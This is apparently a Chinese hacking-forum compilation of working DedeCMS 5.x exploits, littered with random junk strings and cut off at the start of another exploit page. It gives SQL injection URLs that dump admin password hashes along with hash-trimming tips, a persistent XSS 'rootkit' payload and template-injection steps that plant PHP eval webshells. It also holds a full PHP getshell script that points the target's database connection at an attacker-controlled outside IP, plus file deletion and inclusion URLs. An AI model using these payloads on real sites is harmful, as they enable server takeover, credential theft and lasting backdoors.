|
|
2 ~/ r$ |' Y) b$ j; t) v: oDedecms 5.6 rss注入漏洞9 w4 z5 j5 t7 t5 g1 `
http://www.test.com/plus/rss.php?tid=1&_Cs[][1]=1&_Cs[2))%20AND%20%22%27%22%20AND%20updatexml%281,%28SELECT CONCAT%280x5b,uname,0x3a,MID%28pwd,4,16%29,0x5d%29%20FROM%20dede_admin%29,1%29%23'][0]=1& m& W; }* L3 M, U
' w3 m& x/ C( g, A0 x% N% j+ x& {3 T$ _% I& H5 \) E& O* Y8 z- u; E
0 P/ k! ]/ g7 Z
' U j9 R9 n9 A
: k4 \$ }: X7 S+ o" Z& u9 J: X
' S* G H- v; R+ W, c8 x' J1 U: r$ z7 q& r0 p# J
% k8 j9 J- P# J
DedeCms v5.6 嵌入恶意代码执行漏洞
/ i7 a) D1 p! s" x' V' g注册会员,上传软件:本地地址中填入 a{/dede:link}{dede:toby57 name\="']=0;phpinfo();//"}x{/dede:toby57}" p" D& s+ t& D9 F! {' _! a1 |
发表后查看或修改即可执行
5 u2 t9 f8 p% |, V/ I2 @a{/dede:link}{dede:toby57 name\="']=0;fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz5iYWlkdQ));//"}x{/dede:toby57}
: _, b4 q5 @. \& D8 M$ ^1 D生成x.php 密码xiao,直接生成一句话。
# Z0 w7 T L! V1 a" m; Y* R1 `( _2 t" |, l0 |+ h( h' S
2 c8 h: ~$ w7 {3 C ]2 P% S- \3 w* T: K8 A j4 V
. [! C0 {$ s. o3 |" g
6 U8 W3 Q. C7 D" p5 u# u0 e
5 {" O3 i5 |* j( W ?- K" n0 ~: n# X
, i, a7 ?5 u. z; I0 f' D! _' MDede 5.6 GBK SQL注入漏洞. e; e4 o" M9 T" f4 E) m
http://www.test.com//member/index.php?uid=''%20||%20''''%20||%20''%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7'';
) p% Q" [+ F; D1 k$ z; I shttp://www.test.com//member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7WFXSSProbe0 \6 u9 Z8 M8 @: O
http://www.test.com/member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7/ n6 Y* t, O Q6 f
0 {0 A" d. { ` Q& C7 D |: u
+ k% P* g) Z4 v
6 B& ^: n) {$ A, r$ p2 b2 [' q) R4 A2 x
1 A: M9 O4 _2 B8 C
% a: {7 c$ f" H% \
, w" G- Z4 O7 H/ @
: U w; ^; B; H' E( X! y0 L+ }DedeCms V5.6 plus/advancedsearch.php 任意sql语句执行漏洞
) J7 |2 |: r4 s4 d0 M& [http://www.test.com/plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin` 4 F$ j: G1 I/ x0 {" k0 ^
- I, X0 _6 C% ^& S4 w3 r
7 L+ m; a+ x3 b3 W7 P5 M( t- _
9 B! Z6 w$ U$ I( V) D. Z C! Z7 O9 l. k( Q
$ y: r" I1 ]* I% c% Z
; I7 U8 a9 K, RDEDECMS 全版本 gotopage变量XSS漏洞
3 v: b" `" L# J+ k6 D* d6 F1.复制粘贴下面的URL访问,触发XSS安装XSS ROOTKIT,注意IE8/9等会拦截URL类型的XSS漏洞,需关闭XSS筛选器。 - X1 Q. C" d) O; ? C
http://v57.demo.dedecms.com/dede/login.php?gotopage="><script>eval(String.fromCharCode(80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,61,39,34,62,60,115,99,114,105,112,116,62,97,108,101,114,116,40,47,120,115,115,32,114,111,111,116,107,105,116,33,47,41,60,47,115,99,114,105,112,116,62,60,120,61,34,39,59,32,13,10,118,97,114,32,100,97,116,101,61,110,101,119,32,68,97,116,101,40,41,59,13,10,118,97,114,32,101,120,112,105,114,101,68,97,121,115,61,51,54,53,59,32,13,10,100,97,116,101,46,115,101,116,84,105,109,101,40,100,97,116,101,46,103,101,116,84,105,109,101,40,41,43,101,120,112,105,114,101,68,97,121,115,42,50,52,42,51,54,48,48,42,49,48,48,48,41,59,13,10,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,61,39,103,111,116,111,112,97,103,101,61,39,43,80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,43,39,59,101,120,112,105,114,101,115,61,39,43,100,97,116,101,46,116,111,71,77,84,83,116,114,105,110,103,40,41,59,13,10,97,108,101,114,116,40,39,88,115,115,32,82,111,111,116,107,105,116,32,73,110,115,116,97,108,108,32,83,117,99,99,101,115,115,102,117,108,32,33,33,33,33,39,41,59))</script><x="9 n4 T5 h+ Z# h1 }, I F( T, L
9 h+ u5 P- }1 T% l# @
4 w0 o+ H3 h9 X1 U6 m2.关闭浏览器,无论怎么访问下面的任意URL,都会触发我们的XSS。
& f' ?0 i% _8 \0 ?% e, \http://v57.demo.dedecms.com/dede/login.php?gotopage=dasdasdasda5 y3 c b! y$ j! w- L
% x$ p& }2 J; }9 o1 j- {: Z6 U& o
q4 r+ _1 D1 h1 Ghttp://v57.demo.dedecms.com/dede/login.php5 K/ ]% E1 ]% L/ i3 T
) ?1 q4 z: i4 E- u% G% H& \* l+ h9 r& L* E8 Z$ }, y1 Y
color=Red]DeDeCMS(织梦)变量覆盖getshell
2 @) Q; y4 x3 Y3 }6 |#!usr/bin/php -w
$ |7 P* ^. l) A% K7 s' V<?php7 @. x" t% ?+ ]" e7 u8 v
error_reporting(E_ERROR);
, A$ A1 O* G+ ~" _set_time_limit(0);
! s1 {5 R1 {3 Oprint_r('" T: }/ e5 K2 K4 s
DEDEcms Variable Coverage
7 G0 p$ G# V# q! pExploit Author: www.heixiaozi.comwww.webvul.com1 v& J# N8 `5 E g' v2 C$ O( _- g
);
' e) D/ ^! @# N8 i( ~" \/ u1 @echo "\r\n";
' f3 S9 a, }+ w8 {/ i3 [4 ?if($argv[2]==null){% i% K6 |2 }( o- X- E
print_r('
, ]7 \7 w! P; |% G/ D+---------------------------------------------------------------------------+
1 [5 \+ g5 G3 B1 b* bUsage: php '.$argv[0].' url aid path
* [- |3 u% e" ^; B# yaid=1 shellpath /data/cache aid=2 shellpath= / aid=3 shellpath=/plus/
! Q3 D7 r. }, r% G$ [Example:
$ ~: A& `- T! ]php '.$argv[0].' www.site.com 1 old! ]" Y4 Q' z5 o+ Q
+---------------------------------------------------------------------------+
. }" R/ o/ B$ U) p');
9 A5 s; m# H! S5 V6 F3 h: ?exit;8 e! t \! ?8 g! d6 }9 U
}
, s! M; \$ r0 V2 P1 h$url=$argv[1];1 n8 i& y& c& j3 P
$aid=$argv[2];0 W, M; |$ ~+ g( s* u" S
$path=$argv[3];9 t( _5 D7 S; w$ d. V0 D
$exp=Getshell($url,$aid,$path);* T( \4 b5 Q" j8 f+ G6 \- [, \, X
if (strpos($exp,"OK")>12){' f! s5 M' b ~8 W
echo "
5 j6 q# C2 G H U7 \Exploit Success \n";) j1 @7 C; r: U2 ~- d
if($aid==1)echo ", L# a. K8 s& u# p
Shell:".$url."/$path/data/cache/fuck.php\n" ;
5 \/ b4 i5 Q& |$ a2 ^$ [7 y$ A8 d! v0 O
% w& E, q8 W5 X7 g* a
# p- m* @- |8 |+ s e' T# T: dif($aid==2)echo ": S+ K: w# q' Z: h! c
Shell:".$url."/$path/fuck.php\n" ;/ N* s7 K. M9 I0 k
- z/ N. c6 o6 v: e+ C
% {$ m! i7 ]. |# [" C6 mif($aid==3)echo "
8 D0 R# e8 Y+ }( V* n$ XShell:".$url."/$path/plus/fuck.php\n";) @# } ~# Q, s8 r
2 |! m! f+ k8 k1 s- H
% P2 j: l U/ Q6 K a1 T6 C
}else{
2 N$ A) y5 c, B3 s0 c3 ]echo "
& g2 c3 H. c& S8 i( U2 lExploit Failed \n";9 u! L8 R4 L/ h+ j* d
}8 v& ]/ a p: E6 R
function Getshell($url,$aid,$path){
# X. n/ H/ A6 H$id=$aid;. I- O% m3 d: J7 U
$host=$url;
& `0 v/ x t" k, d |. w+ }$port="80";/ G0 u6 n) C- h" X' _
$content ="doaction=http%3A%2F%2F$host%2Fplus%2Fmytag_js.php%3Faid%3D1&_COOKIE%5BGLOBALS%5D%5Bcfg_dbhost%5D=184.105.174.114&_COOKIE%5BGLOBALS%5D%5Bcfg_dbuser%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbpwd%5D=90sec&_COOKIE%5BGLOBALS%5D%5Bcfg_dbname%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbprefix%5D=dede_&nocache=true&QuickSearchBtn=%CC%E1%BD%BB";
! j$ F( D0 N" d- Q$data = "POST /$path/plus/mytag_js.php?aid=".$id." HTTP/1.1\r\n";
" C. O, _" H# F Y' n0 s$data .= "Host: ".$host."\r\n";: c9 N8 H4 L# y |0 b- O& O! B
$data .= "User-Agent: Mozilla/5.0 (Windows NT 5.2; rv:5.0.1) Gecko/20100101 Firefox/5.0.1\r\n";: N& _: M. b0 }% W% E1 D: A* L
$data .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";
& L/ b V6 u) j8 O$data .= "Accept-Language: zh-cn,zh;q=0.5\r\n";
1 ^: x1 e7 l; Z/ Q1 r9 l+ y//$data .= "Accept-Encoding: gzip,deflate\r\n";
# [- P# @" b5 d4 O2 c$data .= "Accept-Charset: GB2312,utf-8;q=0.7,*;q=0.7\r\n";
! G( g( c# N5 u6 _$data .= "Connection: keep-alive\r\n";
% i9 Z. i3 h9 @$data .= "Content-Type: application/x-www-form-urlencoded\r\n"; g$ d2 b: D. U9 A
$data .= "Content-Length: ".strlen($content)."\r\n\r\n";8 n- [! `: Y2 S* |; Q
$data .= $content."\r\n";
2 m7 Q" X3 U% w' d; V5 |$ock=fsockopen($host,$port);
7 B. g; w: ~' nif (!$ock) {
4 D W( u( {# becho "
; K9 D0 W& Z. p& J4 eNo response from ".$host."\n";; C* h" r+ g% e7 Q2 B
}
: ^. y+ R& W" f- {; d2 f# `8 ~/ n7 \fwrite($ock,$data);1 G2 t$ [0 k; R9 i' Q
while (!feof($ock)) {9 J, Z+ h- v4 u' ~" [6 y7 a
$exp=fgets($ock, 1024);
% f4 k3 ~- {+ t7 j/ Q7 ~6 |0 e# H; Ereturn $exp; |$ s% K/ P# u) ~* `% a" G# f: A/ O
}& a" C$ s9 n3 l9 c( z- B9 [
}
0 }0 ]- Y6 w/ y9 @/ Y
+ ~, A) B; X: n. Y. a$ J) s4 [4 t4 q% {
?>
. c5 N5 g! H o" r! A1 ~
' [7 O; i/ x' \7 v+ L" D% m6 j4 p! A6 w
0 A4 i4 u! G# N& ^* P6 ]1 s9 k
" c4 F6 Y, X$ G
9 ?, E4 h% V. E, ^+ O
9 }$ |3 ?- [8 Z k
' \' Z( I# q* a( `* }% S N9 V
s9 @/ ]/ n. V/ _9 N! r
( {% o" h7 N n& i% d8 `; E# K1 h
- K- [( `) B, f. E2 h kDedeCms v5.6-5.7 越权访问漏洞(直接进入后台) r: S- i1 g# `' f3 I1 J1 N
http://www.ssvdb.com/织梦网站后台/login.php?dopost=login&validate=dcug&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0&_POST[GLOBALS][cfg_dbname]=root
, l6 y: e2 h2 x3 W, h/ q- S
* E/ C5 r4 i: S9 p
6 \2 f4 q8 W3 x4 |把上面validate=dcug改为当前的验证码,即可直接进入网站后台
$ L; `& H" |3 Q6 M2 \
6 F5 {1 A9 o8 k0 E2 w6 q1 j
- G# ]; `: m- t! a% y此漏洞的前提是必须得到后台路径才能实现
, W8 o$ h$ ~/ [1 c0 |" [
0 H* j+ S j% c7 _. K( I+ a+ P- I: L. |, |
: n0 ^9 O* p6 q* `
f5 k( k% V, b5 a# j6 B! c/ W/ k& W1 E# c8 R' }" D
3 E3 \* H) d: a2 K2 f, |: \
6 v# F7 F7 g& H0 W
. a! i8 L2 }$ z5 H U( I! e. a! ~$ s. E: ?( D8 r* r8 e
, G5 X. u ?' [0 L, V0 s9 `Dedecms织梦 标签远程文件写入漏洞
4 o( H* n) j( |/ ^1 ]+ d前题条件,必须准备好自己的dede数据库,然后插入数据: insert into dede_mytag(aid,normbody) values(1,''{dede:php}$fp = @fopen("1.php", \''a\'');@fwrite($fp, \''\'');echo "OK";@fclose($fp);{/dede:php}'');7 \5 T; J2 {- y9 D9 K
8 p+ N$ k2 T/ Y s0 l
5 _7 C a4 ~2 C再用下面表单提交,shell 就在同目录下 1.php。原理自己研究。。。 : H6 O5 }6 {+ p% C5 L
<form action="" method="post" name="QuickSearch" id="QuickSearch">
7 S: }0 L6 ?* h! M+ F7 Q) Q6 T1 ^<input type="text" value="http://www.tmdsb.com/plus/mytag_js.php?aid=1" name="doaction" style="width:400"><br />, `+ U/ K4 Z# F- K2 k; B
<input type="text" value="dbhost" name="_COOKIE[GLOBALS][cfg_dbhost]" style="width:400"><br />
2 J( ^4 i8 f. d0 V8 c9 n<input type="text" value="dbuser" name="_COOKIE[GLOBALS][cfg_dbuser]" style="width:400"><br />
% M( t! R% C% Z<input type="text" value="dbpwd" name="_COOKIE[GLOBALS][cfg_dbpwd]" style="width:400"><br />1 x- {$ n, ]$ z9 D* m3 _0 q
<input type="text" value="dbname" name="_COOKIE[GLOBALS][cfg_dbname]" style="width:400"><br />4 J, |4 J1 f. P2 k8 V8 z
<input type="text" value="dede_" name="_COOKIE[GLOBALS][cfg_dbprefix]" style="width:400"><br />
A, N3 H0 x% C: B2 K<input type="text" value="true" name="nocache" style="width:400">) v8 I6 @4 e6 F/ U1 i
<input type="submit" value="提交" name="QuickSearchBtn"><br />
^# }5 b- v, h, a: U1 F* ?: i- @</form>
B7 D x: ]3 z( P$ C<script>9 O; q0 T: y/ I+ O
function addaction()
( q" }7 u1 A, X7 h; B7 O1 |{2 A/ Y5 F8 Q( V
document.QuickSearch.action=document.QuickSearch.doaction.value;
: N6 _; t1 B' t0 N/ y}
, e+ P3 j% T3 C* b. N</script>' G7 M3 k4 g; }$ p, U
, H; ?, |; h Z/ N4 T
8 c9 [$ P4 w S6 h F0 [; j- T
! E/ C% K C5 F8 _1 U# A, N: Q) E% C+ v( k# q/ g; |1 x
, |) k7 t4 x2 T# m( i1 I1 f7 C( l* K& ~4 k
* X/ r8 ?2 o3 T- j1 Q
+ B8 {2 i" [) k+ z- [5 C
/ Z; `& i( ?+ L8 r# F$ u2 A l& ^( F d& k. d" v3 O% V. W! r
DedeCms v5.6 嵌入恶意代码执行漏洞
; w9 K/ L& w. J6 `2 R4 v, K注册会员,上传软件:本地地址中填入a{/dede:link}{dede:toby57 name\="']=0;phpinfo();//"}x{/dede:toby57},发表后查看或修改即可执行
( j' ~, Q# k4 [1 F# ja{/dede:link}{dede:toby57 name\="']=0;fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz5iYWlkdQ));//"}x{/dede:toby57}
) |( w) F7 S! O4 W生成x.php 密码:xiao直接生成一句话。密码xiao 大家懂得
0 b* b; n2 B, @6 YDedecms <= V5.6 Final模板执行漏洞
4 z" G& C E5 B. o/ y- \0 [9 h注册一个用户,进入用户管理后台,发表一篇文章,上传一个图片,然后在附件管理里,把图片替换为我们精心构造的模板,比如图片名称是:
5 R0 k- G( a7 e& V; Uuploads/userup/2/12OMX04-15A.jpg. z1 m5 z! u( _% @2 Q6 \
6 ]3 u) O) ~9 h0 m
( ?4 i2 q6 x1 \$ ^模板内容是(如果限制图片格式,加gif89a):
+ I5 w; q1 ?3 n5 y% J X* k{dede:name runphp='yes'}; w0 r# A5 e* \2 R
$fp = @fopen("1.php", 'a');
$ `+ p" f G% H! k; D! Y; _. H/ D7 J@fwrite($fp, '<'.'?php'."\r\n\r\n".'eval($_POST[cmd])'."\r\n\r\n?".">\r\n");2 `9 _* O1 x, ]4 M4 ^3 ?/ P& ^( p, Y
@fclose($fp);
. S1 _! | |( A; m7 O{/dede:name}; P- q* S$ f( N0 U8 P3 s# |/ L1 H" i
2 修改刚刚发表的文章,查看源文件,构造一个表单:* e% t4 l* _! m1 w0 J. g
<form class="mTB10 mL10 mR10" name="addcontent" id="addcontent" action="http://127.0.0.1/dede/member/article_edit.php" method="post" enctype="multipart/form-data">
. b$ c0 C2 d, ]7 F" y<input type="hidden" name="dopost" value="save" />3 h) c. `5 y M0 X2 F
<input type="hidden" name="aid" value="2" />
! O) o9 J. |; j0 p, E<input type="hidden" name="idhash" value="f5f682c8d76f74e810f268fbc97ddf86" />, ^1 Z; S! |2 T- {6 B2 L
<input type="hidden" name="channelid" value="1" />+ j, A+ K5 Q! a" x
<input type="hidden" name="oldlitpic" value="" />5 B" @6 d/ y9 j
<input type="hidden" name="sortrank" value="1275972263" />: H8 _# y+ c5 W h. R& Q% D+ }
0 ]4 ~. w, _+ S& D( G
. K1 P8 @! m- U" y<div id="mainCp">& Q. K+ T! ^, K
<h3 class="meTitle"><strong>修改文章</strong></h3>1 O$ D- e# E: P2 H; I/ D
( W" b+ L% e' Y5 E- i
9 l1 \% J! y% ~+ [5 L
<div class="postForm">
% p/ |2 Q: }, y8 B$ K<label>标题:</label>
$ p# e) z5 p5 m- H) y<input name="title" type="text" id="title" value="11233ewsad" maxlength="100" class="intxt"/>7 d1 D+ h5 Z. a
" \& E$ S4 \( V
. j' y: p# j/ D; Q. a1 z7 f<label>标签TAG:</label>, @7 u1 M+ K3 E0 B+ o7 {
<input name="tags" type="text" id="tags" value="hahah,test" maxlength="100" class="intxt"/>(用逗号分开)
; y; h) \7 C. J2 ~
$ W& z6 X+ i8 U* i6 q" \. `) }. j! W8 @. j/ g# e- e; P
<label>作者:</label>0 o. U3 y( L: K% o1 m6 Z( D
<input type="text" name="writer" id="writer" value="test" maxlength="100" class="intxt" style="width:219px"/>
! I6 {9 k! t. k! K7 W& a8 p! F0 t9 Y* @- P- O1 Q
$ a9 v; A1 ?7 S9 X+ m+ s9 k7 L# {* m
<label>隶属栏目:</label>
! a7 Z* [, E, }6 z5 S<select name='typeid' size='1'>
( H, a# P- b! E: K2 f, [4 n- P<option value='1' class='option3' selected=''>测试栏目</option>
( L$ I+ @# m1 p; n3 \; v1 H" ~8 `) n</select> <span style="color:#F00">*</span>(不能选择带颜色的分类)1 S' l8 a- J- G+ G
6 l) j5 J2 L/ b% }! v |
: ^2 q c. J0 M+ [<label>我的分类:</label>+ D# T" x$ f4 J3 W. a
<select name='mtypesid' size='1'>8 ]3 B/ p$ [, w( {6 @
<option value='0' selected>请选择分类...</option>+ D, p$ [* W1 n
<option value='1' class='option3' selected>hahahha</option>2 A, n4 C: [. O8 Y0 r
</select>2 q3 t: L$ m6 {6 y1 Z6 ]1 t6 B
4 I, `- ]9 l$ p
3 i7 Z' `) O8 J" A) Y
<label>信息摘要:</label>
8 s# u8 x: U5 {8 u7 Z4 ~/ S2 ~<textarea name="description" id="description">1111111</textarea>
9 r N5 _6 i) H. a(内容的简要说明)
1 k) q( p% s4 K# s) Y6 Z
. k5 H% T0 z$ t' [ P5 g6 ]
7 @' V- d }, \6 Q" b' i<label>缩略图:</label>3 v9 S; h7 B1 l( j3 w# k
<input name="litpic" type="file" id="litpic" maxlength="100" class="intxt"/>+ R+ h: W* y+ A4 {/ V. s
. i! K) g7 e% v2 D' E4 o& n5 g; q, P2 a) ?: C
<input type='text' name='templet'$ q5 H$ T$ h- e' H) z( i
value="../ uploads/userup/2/12OMX04-15A.jpg">( J8 L1 z) c! T- [! f; y7 v
<input type='text' name='dede_addonfields', T" b. s% ^( Y/ {! R! k
value="templet,htmltext;">(这里构造)% @- p! E0 c$ S B1 f; d. O
</div>: d: m. S b& o6 }7 v; i, y
' |: N7 z' Q) T$ A+ j+ i( H2 C+ h5 S
! @1 h: J0 ]4 | k/ g3 z- l<!-- 表单操作区域 -->
# D+ H! X) f9 V5 c! |. I" k<h3 class="meTitle">详细内容</h3>5 G& w1 z8 I% E0 H0 i ?3 B
& p+ k& T7 J( ^" c# u0 ^
% M& l0 p( C+ E' D0 [
<div class="contentShow postForm">/ w6 C; \9 O/ b9 \
<input type="hidden" id="body" name="body" value="<div><a href="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" target="_blank"><img border="0" alt="" src="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" width="1010" height="456" /></a></div> <p><?phpinfo()?>1111111</p>" style="display:none" /><input type="hidden" id="body___Config" value="FullPage=false" style="display:none" /><iframe id="body___Frame" src="/dede/include/FCKeditor/editor/fckeditor.html?InstanceName=body&Toolbar=Member" width="100%" height="350" frameborder="0" scrolling="no"></iframe>( s) p% x2 m( V/ m0 O
, ~8 u' p4 j! N; s7 ~. ?
& b1 b- |# U+ \1 a
<label>验证码:</label>
1 o7 ?0 y7 C) ?( k5 G y2 ]<input name="vdcode" type="text" id="vdcode" maxlength="100" class="intxt" style='width:50px;text-transform:uppercase;' />0 ]& E. {# {3 ?0 M
<img src="http://127.0.0.1 /dede/include/vdimgck.php" alt="看不清?点击更换" align="absmiddle" style="cursor:pointer" />; O; p- l/ y* o& h& g; M7 N
* d8 r9 y* o/ W9 `# J2 P# v' O3 P% w0 Z& S3 p8 B0 q# L
<button class="button2" type="submit">提交</button>
7 R& {4 V* M) a<button class="button2 ml10" type="reset">重置</button>. s& `* S, }, c/ @# a! }
</div>
$ g. G+ M$ D1 O. B1 x
; N% q5 R5 x0 D; g. F! G. }: R' Q. h% b+ M3 I
</div>
6 K% _' w4 w H6 p/ B! e3 ~: K2 f1 \! c9 Z7 R4 j$ z! D# {
* F7 H2 o& ?; h1 ]- |; t7 @</form>8 ~, k6 X8 O( ]$ t4 I( S* W
& s" @0 i: K; Q4 s" p
' B- [/ D! H- E: r. @7 t
提交,提示修改成功,则我们已经成功修改模板路径。 3 访问修改的文章:7 \' E* t8 m( q7 M! j; e
假设刚刚修改的文章的aid为2,则我们只需要访问:" ^- y" q: y4 }% F" X5 g- D# y
http://127.0.0.1/dede/plus/view.php?aid=2$ c4 h8 n. `8 v1 f. V
即可以在plus目录下生成webshell:1.php
8 D! S0 |' f9 d7 o
0 _. |' a/ _& B! I% w) I; z" l+ c6 C' \: y- @) ~+ g$ w/ R( p* c* A4 k
/ h& n% |4 W! x" C* s6 F6 d: o( A
. B4 f! q8 _" j/ M' V# F$ ^- {/ J6 u
$ a' f4 y& D4 J: P
& z' G" O2 [# P
) n3 k, ^3 O. v8 O0 I8 x; U* A" Y" c
% |$ {( ?& B \! r" v
# _! |: k3 N8 p3 P, E0 K7 b' G/ F( i2 q+ `
. N. x5 U& {% q6 d! ~; l
DEDECMS网站管理系统Get Shell漏洞(5.3/5.6)
0 c3 G6 i$ L7 R1 s) \Gif89a{dede:field name='toby57' runphp='yes'}
% t3 R2 @2 V! O, E; ^phpinfo();1 N! d3 h! W- N2 G
{/dede:field}6 C6 _! y `0 @6 @* k) l
保存为1.gif% ]3 p/ Y* M) D" N) X+ P
<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/uploads_edit.php" method="post" enctype="multipart/form-data" ">
; Z8 M7 ^ L! i. A8 x( D<input type="hidden" name="aid" value="7" /> / P0 r) c+ Q; `2 [8 N2 h0 ^
<input type="hidden" name="mediatype" value="1" />
2 U5 u# U$ Q0 F4 ~) V9 Y<input type="text" name="oldurl" value="/DedeCmsV5.6-GBK-Final/uploads/uploads/userup/3/1.gif" /></br> - L) i7 x; Z; L: G8 t
<input type="hidden" name="dopost" value="save" /> / ]1 p- k$ T' g* \0 G* J- ^
<input name="title" type="hidden" id="title" value="1.jpg" class="intxt"/>
6 B% d0 ^+ {9 i. M% f0 _ x" v<input name="addonfile" type="file" id="addonfile"/>
Z. B+ m; T! X+ p. Z+ T0 [! _2 Y<button class="button2" type="submit" >更改</button> 5 _; e1 ^/ `# `% S2 U. l N
</form>
: O1 ?+ x5 l& H! e* @$ t4 ]: t3 x1 r+ v: W
X/ l& [8 W7 n4 e构造如上表单,上传后图片保存为/uploads/userup/3/1.gif
: B, M& Z- s. B2 q' a! `: b/ K' t发表文章,然后构造修改表单如下:2 Q& }1 Z, k8 I# {' F# I
- g8 y5 H, P6 b# N) f$ e; b0 ~+ L' M
+ y3 q+ i! M* J1 O/ x<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/article_edit.php" method="post" enctype="multipart/form-data"> 9 ?+ L2 `# l3 d
<input type="hidden" name="dopost" value="save" />
- h: S- x* N7 R6 s! i6 o<input type="hidden" name="aid" value="2" /> 3 F, e+ ~1 w- ?3 V6 @( ]
<input type="hidden" name="idhash" value="ec66030e619328a6c5115b55483e8dbd" /> 7 W0 ?# Z* V# r: T
<input type="hidden" name="channelid" value="1" /> ! ~ l( T/ \0 e5 @- e
<input type="hidden" name="oldlitpic" value="" />
_- }4 J$ K. N. ?8 `: W. K<input type="hidden" name="sortrank" value="1282049150" /> 8 T6 S( K3 K. m$ u1 _0 O
<input name="title" type="text" id="title" value="aaaaaaaaaaaaaaa" maxlength="100" class="intxt"/>
/ i$ K% Y/ a7 {+ h% b4 A) t; H<input type="text" name="writer" id="writer" value="123456" maxlength="100" class="intxt" style="width:219px"/> 2 |( R: d2 n, v7 C3 S
<select name='typeid' size='1'> * i2 J1 s: w# M7 ^8 E7 V9 c
<option value='1' class='option3' selected=''>Test</option>
! c* h( ?1 t7 b<select name='mtypesid' size='1'> Y# D B. Z0 T
<option value='0' selected>请选择分类...</option> 8 M1 L9 q, v* o4 u& Q
<option value='1' class='option3' selected>aa</option></select>
% L4 F/ }* t+ ^. u0 s$ F0 d<textarea name="description" id="description">aaaaaaaaaaaaa</textarea>
7 M: \2 b% A S: S4 ^2 o<input type='hidden' name='dede_addonfields' value="templet">
' `: `4 ^, U" [+ C4 |<input type='hidden' name='templet' value="../uploads/userup/3/1.gif"> 3 K; V( n R. [2 O
<input type="hidden" id="body" name="body" value="aaaa" style="display:none" />
. N( p$ A- u, Q4 O+ h<button class="button2" type="submit">提交</button> * E: F" C& G- R) U. ?. `, b& g
</form>
# a/ `* J6 u8 Y, O0 F. ]) t. b! i$ h' @
' b. q j+ A: G: ^( f
" W0 s! O/ ~+ c# q
8 n- D' k/ u3 x5 x. B. N' _9 h: O$ u% G: w# z: o
8 e2 Q1 R/ v) w L1 h5 s
& K3 g9 W: I9 l6 d. Q6 R
% g+ \$ o1 q) D& Z; [0 |
; P- X1 t8 ?" O! t' `) c3 S) Q/ b# ?# F% r) ?6 {- c
9 Y7 i+ w/ ~% h" L
- U4 U6 ?4 T3 F织梦(Dedecms)V5.6 远程文件删除漏洞
& F+ Q. a0 d1 L/ T0 @8 ]$ H4 @3 shttp://test.com/member/edit_face.php?dopost=delold&oldface=/uploads/userup/8/../../../member/templets/images/m_logo.gif
8 k3 [8 s" q3 V3 O1 C) h8 U5 Y; q% J
, {9 I# T# H. C( T+ A
. q/ m" [" ?+ q' y
* E+ T4 H/ Y: f% C- L" T+ K; G0 S5 K" c* N# u: [
0 }0 y6 e2 D% M9 Y& w. w2 C3 z! l- k2 z: w/ i! M
$ d1 J% w8 l8 I2 R8 p5 F, f: l# x! Z( @( u% G
' X; e( U+ c. s织梦(Dedecms) V5.6 plus/carbuyaction.php 本地文件包含漏洞 & k4 |: M5 S1 @; a
http://www.test.com/plus/carbuya ... urn&code=../../
% F2 k9 V/ k$ o- f$ X% t! M6 y4 r2 U) T% V" O8 a. T$ e* i+ F0 g
' T7 I4 B) \) z5 X
- X9 z6 T' V! v/ Q/ T
/ ~% h1 |1 [4 |2 _. Z0 B; [, o6 I, f& W
. [) H+ ?, m" h( [- C) i$ m6 g( V9 X X8 E1 J. k$ g! ^6 a
: h4 i6 @1 G. x* w$ Q+ B$ \* Q; z" y6 T0 t3 }! [$ {
1 z, a( K5 u- H: Z6 F! c6 J
DedeCms V5.6 plus/advancedsearch.php 任意sql语句执行漏洞
! l7 M" m" \- ]. v: M1 S& v0 _plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin`9 O% V& a; R" `( X* T- M* N9 Z
密码是32位MD5减去头5位,减去尾七位,得到20 MD5密码,方法是,前减3后减1,得到16位MD5
0 d& y Q2 i' q) I/ m: n& m8 |6 T1 c" ~
& c. t$ t: }. c' C) `
, T5 T }9 h) M
7 _/ W/ }+ n. _+ A% `0 E6 e- ~3 y( \2 M- V, ~
$ ]) f6 E* W% I
4 Z3 Q5 [0 G% J0 u3 n P" w2 M7 u) T& M' g, W: o3 L, y
0 h& n e9 s' Y. C8 u. t6 ]/ ?9 [8 K
织梦(Dedecms) 5.1 feedback_js.php 注入漏洞- Z% f) j( A3 a+ g/ p& M! f; k' X7 s
http://st0p/dedecms51/plus/feedback_js.php?arcurl=' union select "' and 1=2 union select 1,1,1,userid,3,1,3,3,pwd,1,1,3,1,1,1,1,1 from dede_admin where 1=1 union select * from dede_feedback where 1=2 and ''='" from dede_admin where ''='6 o1 P# m1 K5 Q1 Z
! O+ u2 s% @& V. e$ _, M4 Q
0 v% y$ E4 w7 k+ Z5 k$ |9 z$ V* [2 Q9 T7 }; z7 }
. d- f# ^& i/ Z E& B% h+ v- c* k( ^0 y* [9 R
4 K: H% R/ U! h) E7 g
7 k: _0 f' S7 S6 \3 F& @$ m0 o
! E P% T3 X( ?% C
3 R6 w3 P# C4 g
! W( l0 O8 K c% Q$ J8 s织梦(Dedecms)select_soft_post.php页面变量未初始漏洞
" c7 K m9 |. h' v. u7 M6 s<html>. M8 _! w4 D0 E
<head>, y8 n+ H8 E: Y$ }& |# v: n
<title>Dedecms v55 RCE Exploit Codz By flyh4t</title>: w$ u, a) g5 t$ U
